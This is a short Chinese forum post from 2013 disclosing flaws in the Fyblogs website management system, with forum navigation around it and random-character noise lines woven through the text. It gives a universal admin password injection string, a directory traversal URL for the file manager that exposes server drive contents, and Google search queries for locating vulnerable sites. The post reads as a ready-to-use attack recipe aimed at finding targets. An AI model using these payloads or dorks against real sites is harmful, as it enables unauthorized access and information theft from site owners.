找回密码
 立即注册
查看: 2932|回复: 0
打印 上一主题 下一主题

Fyblogs网站管理系统漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:17:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
后台万能密码 'or'='or'
# U8 j% G' ~) e) T7 V# W) u8 r8 J+ A5 j
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% }7 U6 l& ^4 Y) l( T8 q- Aadmin/uploadfile.asp?currentFolder=/upfiles/../
. J4 Y4 h7 _' \6 o4 z; g
2 R7 p5 d/ I7 H2 O6 c1 |漏洞证明:
5 K4 \7 U3 C/ u( x( u& _7 }% {
% _3 w& |; o- D6 p6 O0 ^谷歌:inurl:type.asp?id=1 新闻中心# N. p" z2 ?8 A2 D4 u* t8 O
或者 :inurl:download_ok.asp?- n6 G; G7 D) g

  J, N1 P3 l" u" L8 D2 E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表